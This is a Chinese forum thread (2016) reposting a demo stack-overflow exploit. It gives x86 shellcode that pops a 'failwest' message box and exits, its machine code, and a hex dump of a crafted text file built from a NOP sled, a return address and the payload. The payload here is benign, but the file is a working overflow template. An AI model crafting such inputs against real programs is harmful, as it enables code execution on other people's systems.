• 1076阅读
  • 2回复

ShellCode欺骗的艺术! [复制链接]

上一主题 下一主题
离线啊冲
 

只看楼主 倒序阅读 使用道具 楼主  发表于: 2016-02-04


网上看到一份ShellCode  非常NICE  ,用来抛砖引玉!


[cpp] view plain copy
  1. sub sp,0x440  
  2. xor ebx,ebx  
  3. push ebx  
  4. push 0x74736577  
  5. push 0x6c696166  
  6.   
  7. mov eax,esp  
  8. push ebx  
  9. push eax  
  10. push eax  
  11. push ebx  
  12.   
  13. mov eax,0x76F5FD1E  
  14. call eax//messagebox,修改  
  15.   
  16. push ebx  
  17. mov eax,0x76BC79D8  
  18. call eax//exit(0),修改  

得到机器码




[cpp] view plain copy
  1. 013E13CC               66:81EC 4004    sub     sp, 440  
  2.   013E13D1               33DB            xor     ebx, ebx  
  3.   013E13D3               53              push    ebx  
  4.   013E13D4               68 77657374     push    74736577  
  5.   013E13D9               68 6661696C     push    6C696166  
  6.   013E13DE               8BC4            mov     eax, esp  
  7.   013E13E0               53              push    ebx  
  8.   013E13E1               50              push    eax  
  9.   013E13E2               50              push    eax  
  10.   013E13E3               53              push    ebx  
  11.   013E13E4               B8 1EFDF576     mov     eax, USER32.MessageBoxA  
  12.   013E13E9               FFD0            call    eax  
  13.   013E13EB               53              push    ebx  
  14.   013E13EC               B8 D879BC76     mov     eax, kernel32.ExitProcess  
  15.   013E13F1               FFD0            call    eax  

写入到构造的txt文档中 为:




[cpp] view plain copy
[list=1]
  • 00000000h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙悙  
  •   00000010h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙悙  
  •   00000020h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙悙  
  •   00000030h: 90 90 90 90 90 90 90 90 90 90 90 90 4F AE F8 76 ; 悙悙悙悙悙悙O?v  
  •   00000040h: 33 DB 53 68 77 65 73 74 68 66 61 69 6C 8B C4 53 ; 3跾hwesthfail嬆S  
  •   00000050h: 50 50 53 B8 1E FD F5 76 FF D0 53 B8 D8 79 BC 76 ; PPS??v
  • 善者 慈悲心常在 无怨无恨 以苦为乐
    默认压缩密码www.hifyl.com
    文件分享密码问题:http://www.hifyl.com/read-htm-tid-4444.html
    离线im86165507

    只看该作者 沙发  发表于: 2016-02-24
        
    离线v2680267313

    只看该作者 板凳  发表于: 2016-04-30
    用户被禁言,该主题自动屏蔽!
    快速回复
    限100 字节
    如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
     
    上一个 下一个